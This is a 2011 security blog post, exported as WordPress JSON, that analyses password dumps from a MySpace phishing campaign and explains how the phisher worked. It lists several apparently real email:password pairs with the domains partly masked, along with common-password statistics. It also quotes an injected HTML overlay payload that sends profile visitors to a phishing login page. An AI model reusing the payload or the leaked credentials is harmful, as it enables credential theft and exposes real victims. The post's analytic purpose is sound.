{"id":572,"date":"2011-01-11T16:59:29","date_gmt":"2011-01-11T15:59:29","guid":{"rendered":"https:\/\/thebc.ch\/blog\/?p=572"},"modified":"2013-02-01T12:53:25","modified_gmt":"2013-02-01T11:53:25","slug":"analysis-of-passwords-found-by-phishing","status":"publish","type":"post","link":"https:\/\/thebc.ch\/blog\/?p=572","title":{"rendered":"Analysis of passwords found by phishing"},"content":{"rendered":"<div class='toc toc'>\n<h2>Contents<\/h2>\n<ul class='toc-odd level-1'>\n\t<li>\n\t\t<a href=\"#Abstract\">Abstract<\/a>\n\t<\/li>\n\t<li>\n\t\t<a href=\"#The_files\">The files<\/a>\n\t<\/li>\n\t<li>\n\t\t<a href=\"#People_and_fishing\">People and fishing<\/a>\n\t<\/li>\n\t<li>\n\t\t<a href=\"#Password_quality\">Password quality<\/a>\n\t\t<ul class='toc-even level-2'>\n\t\t\t<li>\n\t\t\t\t<a href=\"#The_30_most_used_passwords\">The 30 most used passwords<\/a>\n\t\t\t<\/li>\n\t\t\t<li>\n\t\t\t\t<a href=\"#Password_length\">Password length<\/a>\n\t\t\t<\/li>\n\t\t<\/ul>\n\t<\/li>\n\t<li>\n\t\t<a href=\"#How_the_Phisher_did_it\">How the Phisher did it<\/a>\n\t<\/li>\n<\/ul>\n<\/div>\n<div class='toc-end'>&nbsp;<\/div>\n<span id=\"Abstract\"><h2>Abstract<\/h2><\/span>\n<p>Today I found an interesting article on <a title=\"http:\/\/blogs.securiteam.com\/index.php\/archives\/797\" href=\"http:\/\/blogs.securiteam.com\/index.php\/archives\/797\" rel=\"nofollow\">Myspace phishing site discloses countless usernames and passwords<\/a> on <a title=\"http:\/\/www.securiteam.com\" href=\"http:\/\/www.securiteam.com\/\" rel=\"nofollow\">SecuriTeam<\/a>. Someone must have found the user\/password combo file collected by a phisher. It is a collection of ~57&#8217;000 user\/pass (actually email\/pass) combos. Some of them will be fake, but anyway, I got interested in the whole story.
After some research I found the original advisory on <a title=\"http:\/\/seclists.org\/fulldisclosure\/2007\/Jan\/0270.html\" href=\"http:\/\/seclists.org\/fulldisclosure\/2007\/Jan\/0270.html\" rel=\"nofollow\">FullDisclosure<\/a> (which, by the way, also includes the passdump). I also Googled around a bit and found 3 more files with the name &#8220;myspace.txt&#8221;. This short analysis is based on these 4 passdumps. I really like to play with real data \ud83d\ude42<\/p>\n<p><a id=\"The_files\" name=\"The_files\"><\/a><\/p>\n<span id=\"The_files\"><h2>The files<\/h2><\/span>\n<table>\n<tbody>\n<tr>\n<td><strong>File<\/strong><\/td>\n<td><strong>Size (bytes)<\/strong><\/td>\n<td><strong>Lines<\/strong><\/td>\n<td><strong>Unique lines<\/strong><\/td>\n<td><strong>Comment<\/strong><\/td>\n<\/tr>\n<tr>\n<td>m0<\/td>\n<td>1886347<\/td>\n<td>56590<\/td>\n<td>42575<\/td>\n<td>Original file from the advisory<\/td>\n<\/tr>\n<tr>\n<td>m1<\/td>\n<td>1405905<\/td>\n<td>45325<\/td>\n<td>43098<\/td>\n<td>Found with Google<\/td>\n<\/tr>\n<tr>\n<td>m2<\/td>\n<td>1527730<\/td>\n<td>48892<\/td>\n<td>46664<\/td>\n<td>Found with Google<\/td>\n<\/tr>\n<tr>\n<td>m3<\/td>\n<td>1527769<\/td>\n<td>48900<\/td>\n<td>46664<\/td>\n<td>Found with Google<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><a id=\"People_and_fishing\" name=\"People_and_fishing\"><\/a><\/p>\n<span id=\"People_and_fishing\"><h2>People and fishing<\/h2><\/span>\n<p>Some people realized that they were being phished \ud83d\ude42<\/p>\n<pre>fuck.off.seriousy:computergek\r\nyou really really suck:fuckoffthisissomethingadickwoulddo\r\nyouguyssuck@fuckoff.com:getalifeubastard\r\nfuckyou@fuckoff.com:diephisher  lollol<\/pre>\n<p>Other people don&#8217;t.
They actually try to log in many times (the number before the combo is the number of login attempts):<\/p>\n<pre>[system@nord myspace]# sort * | uniq -c | sort -n | tail -n 30\r\n    18 amandamyspace_email@xxxx.com:josh2202\r\n    18 blndygrl82@xxxxxx.com:luvyachris\r\n    18 dncrj629@xxxxxxxx.net:julie\r\n    18 dtonesuperstarr@xxxxxxxx.com:carla09\r\n    18 eathenallen@xxx.com:candisma3\r\n    18 haleytrash@xxxxxx.com:buttcrack.\r\n    18 iamtyler44@xxxxxx.com:tjh123\r\n    18 katyandjan@xxxxxxx.net:meeow1\r\n    18 latinagirlveronica@xxxxx.com:teddy123\r\n    18 molly_doglover@xx.com:1007404mkk\r\n    20 alicewang93@xxxxxxxxxx.com:puppies11\r\n    21 b_radschenk@xxxxx.com:ford08\r\n    21 gogirl55546@xxxxxx.com:emmakauf!\r\n    21 helenichero617@xxx.com:christian\r\n    21 larissapasifull@xxxxxxx.com:16188s\r\n    21 soccergirlbay94@xxxxxxxx.com:1020064evaandalways\r\n    21 yellowducks4you@xxx.net:norton13\r\n    22 zjs1daddy@xxxxx.com:freeshit4me\r\n    23 jbacaphoto@xxxxxxxxx.net:tiger2\r\n    23 twisted_and_frayed@xxxxxx.com:danny12031986\r\n    24 cathysurmick@xxxx.com:travis13\r\n    24 rlsorey@xx.com:abc123\r\n    24 the_beast525@xxxx.com:zander1\r\n    24 typ.1985@xxxxxxx.com:Mikhail\r\n    27 amandapandapixie@xx.com:panda1\r\n    36 aaron.braesicke@xxxxxx.net:dragon1\r\n    40 prissykatie2@xxxxx.com:swimmer1\r\n    45 southpark1@xxxxxxx.com:ajizzle!\r\n   262\r\n   437 :\r\n[system@nord myspace]#<\/pre>\n<p><a id=\"Password_quality\" name=\"Password_quality\"><\/a><\/p>\n<span id=\"Password_quality\"><h2>Password quality<\/h2><\/span>\n<p><a id=\"The_30_most_used_passwords\" name=\"The_30_most_used_passwords\"><\/a><\/p>\n<span id=\"The_30_most_used_passwords\"><h3>The 30 most used passwords<\/h3><\/span>\n<p>From the original list m0:<\/p>\n<pre>[system@nord myspace]# sort m0 | uniq | awk -F: '{ print $2}' | sort | uniq -c | sort -n | tail -n 30\r\n    13 love123\r\n    13 michael1\r\n    13 password2\r\n    14 asshole\r\n    14 bitch\r\n    14 fuck you\r\n    14 iloveyou\r\n    14 jordan1\r\n    14 qwerty1\r\n    15 123456a\r\n    15 babygirl1\r\n    15 blink182\r\n    15 bubbles1\r\n    15 princess1\r\n    16 123abc\r\n    16 iloveyou2\r\n    17 123456\r\n    17 nicole1\r\n    18 football1\r\n    18 number1\r\n    21 password\r\n    22 i\r\n    24 fuckyou1\r\n    24 myspace1\r\n    28 iloveyou1\r\n    29 monkey1\r\n    34 fuckyou\r\n    56 abc123\r\n    75 password1\r\n   981\r\n[system@nord myspace]#<\/pre>\n<p><a id=\"Password_length\" name=\"Password_length\"><\/a><\/p>\n<span id=\"Password_length\"><h3>Password length<\/h3><\/span>\n<div>\n<div>\n<p><a href=\"https:\/\/thebc.ch\/blog\/572\/analysis-of-passwords-found-by-phishing\/500px-phishing_password_length\/\" rel=\"attachment wp-att-585\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-585\" title=\"500px-Phishing_password_length\" src=\"http:\/\/thebc.ch\/upload\/2011\/01\/500px-Phishing_password_length.png\" alt=\"\" width=\"500\" height=\"246\" srcset=\"https:\/\/thebc.ch\/upload\/2011\/01\/500px-Phishing_password_length.png 500w, https:\/\/thebc.ch\/upload\/2011\/01\/500px-Phishing_password_length-300x147.png 300w\" sizes=\"auto, (max-width: 500px) 100vw, 500px\" \/><\/a><\/p>\n<div>\n<p>Password length<\/p>\n<\/div>\n<\/div>\n<\/div>\n<div>\n<div>\n<p><a
href=\"https:\/\/thebc.ch\/blog\/572\/analysis-of-passwords-found-by-phishing\/500px-phishing_password_length_chart\/\" rel=\"attachment wp-att-586\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-586\" title=\"500px-Phishing_password_length_chart\" src=\"http:\/\/thebc.ch\/upload\/2011\/01\/500px-Phishing_password_length_chart.png\" alt=\"\" width=\"500\" height=\"343\" srcset=\"https:\/\/thebc.ch\/upload\/2011\/01\/500px-Phishing_password_length_chart.png 500w, https:\/\/thebc.ch\/upload\/2011\/01\/500px-Phishing_password_length_chart-300x205.png 300w\" sizes=\"auto, (max-width: 500px) 100vw, 500px\" \/><\/a><\/p>\n<div>\n<p>Password length chart<\/p>\n<\/div>\n<\/div>\n<\/div>\n<p>BUT: if we look at the 20-character passwords, you will see that these aren&#8217;t actually passwords:<\/p>\n<pre>duanne1105duanne1105\r\nyoureastupidjerkface\r\nieatshitforbreakfest\r\n1andrewlennon@yahcgg\r\nfishyp@sbcglobal.net\r\nsuck my dick, pricks\r\nfuckinhackersgo2hell\r\nnice try you asshole\r\nILLHACKYOURMOMSPUSSY\r\nsuckmycockits9inches\r\nworthlesspieceofshit\r\nm loged in you bitch\r\nURADUMBFUKKHAKKERHAH\r\nCoopsieee3Coopsieee3\r\nu suck i aint stupid\r\nheymrhackerurafaggot\r\nfuck you hack wanker\r\njfduoa932p[1rguinfkl\r\nkaykay1211loserific1\r\nstfu and get a life.\r\nthis is fake dipshit\r\nfuck you and yo mama\r\nmind ya own business\r\nyoumustthinkimstupid<\/pre>\n<p><a id=\"How_the_Phisher_did_it\" name=\"How_the_Phisher_did_it\"><\/a><\/p>\n<span id=\"How_the_Phisher_did_it\"><h2>How the Phisher did it<\/h2><\/span>\n<div>\n<div>\n<p><a href=\"https:\/\/thebc.ch\/blog\/572\/analysis-of-passwords-found-by-phishing\/400px-phishing_myspace_login\/\"
rel=\"attachment wp-att-587\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-587\" title=\"400px-Phishing_myspace_login\" src=\"http:\/\/thebc.ch\/upload\/2011\/01\/400px-Phishing_myspace_login.png\" alt=\"\" width=\"400\" height=\"376\" srcset=\"https:\/\/thebc.ch\/upload\/2011\/01\/400px-Phishing_myspace_login.png 400w, https:\/\/thebc.ch\/upload\/2011\/01\/400px-Phishing_myspace_login-300x282.png 300w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><\/p>\n<div>\n<p><a title=\"http:\/\/64.233.183.104\/search?q=cache:u2RtwlpBqFcJ:www.marcolano.com\/login\/+inurl:marcolano&amp;hl=en&amp;gl=uk&amp;ct=clnk&amp;cd=2\" href=\"http:\/\/64.233.183.104\/search?q=cache:u2RtwlpBqFcJ:www.marcolano.com\/login\/+inurl:marcolano&amp;hl=en&amp;gl=uk&amp;ct=clnk&amp;cd=2\" rel=\"nofollow\">Google-Cache<\/a><\/p>\n<\/div>\n<\/div>\n<\/div>\n<ul>\n<li>from <a title=\"http:\/\/seclists.org\/fulldisclosure\/2007\/Jan\/0321.html\" href=\"http:\/\/seclists.org\/fulldisclosure\/2007\/Jan\/0321.html\" rel=\"nofollow\">Waldo<\/a><\/li>\n<\/ul>\n<p>Hmm&#8230; Oh no, it is very easy, yes, very easy what he is doing. He left some traces on some of the &#8220;cracked&#8221; accounts; I was expecting somebody to comment earlier since it&#8217;s been a couple of hours since the initial post.<\/p>\n<p>When you modify a profile you can add this to the data of the profile, you know, those HTML customizations. I found this on one of the accounts that really got my attention a little bit more than the girl of the account \ud83d\ude1b<\/p>\n<pre>HOLA!!!!&lt;a style=&quot;text-decoration:none;position: absolute;top:1px;left:1px;&quot; href=&quot;http:\/\/marcolano.com\/login\/&quot;&gt; &lt;img style=&quot;border-width:0px;width:2024px; height:1768px;&quot; src=&quot;http:\/\/x.myspace.com\/images\/clear.gif&quot;&gt; &lt;\/a&gt;\r\n&lt;a style=&quot;text-decoration:none;position: absolute;top:1px;left:1px;&quot; href=&quot;http:\/\/marcolano.com\/login\/&quot;&gt; &lt;img style=&quot;border-width:0px;width:2024px; height:1768px;&quot; src=&quot;http:\/\/x.myspace.com\/images\/clear.gif&quot;&gt; &lt;\/a&gt;\r\n&lt;embed allowScriptAccess=&quot;never&quot; allowNetworking=&quot;internal&quot; enableJSURL=&quot;false&quot; enableHREF=&quot;false&quot; saveEmbedTags=&quot;true&quot; src=&quot;http:\/\/www...\/mov\/cid_3277_f.mov&quot; width=&quot;1&quot; height=&quot;1&quot;&gt;<\/pre>\n<p>As you might see, this creates a huge invisible link on the page in front of everything, so when you click on anything on the page, like a link or anything, it will take you to that phishing website, so people believe that the account expired and enter their user+pass. Now I believe that his message was a way to tell about a BUG in myspace that should filter that content and is not doing it. So&#8230; we are in fact not talking about a stupid phishing website, for those who still believe that.<\/p>\n<p>Regards, Waldo<\/p>\n<ul>\n<li>and KF enhances:<\/li>\n<\/ul>\n<p><a title=\"http:\/\/www.ninjahype.org\/mov\/\" href=\"http:\/\/www.ninjahype.org\/mov\/\" rel=\"nofollow\">http:\/\/www.ninjahype.org\/mov\/<\/a><\/p>\n<p>nameHREFTrack<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Abstract Today I found an interesting article on Myspace phishing site discloses countless usernames and passwords on SecuriTeam. Someone must have found the user\/password combo file collected by a phisher. It is a collection of ~57&#8217;000 user\/pass (actually email\/pass) &hellip; <a href=\"https:\/\/thebc.ch\/blog\/?p=572\">Continue reading <span
class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[13],"tags":[],"class_list":["post-572","post","type-post","status-publish","format-standard","hentry","category-security"],"_links":{"self":[{"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=\/wp\/v2\/posts\/572","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=572"}],"version-history":[{"count":10,"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=\/wp\/v2\/posts\/572\/revisions"}],"predecessor-version":[{"id":2662,"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=\/wp\/v2\/posts\/572\/revisions\/2662"}],"wp:attachment":[{"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=572"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=572"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=572"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}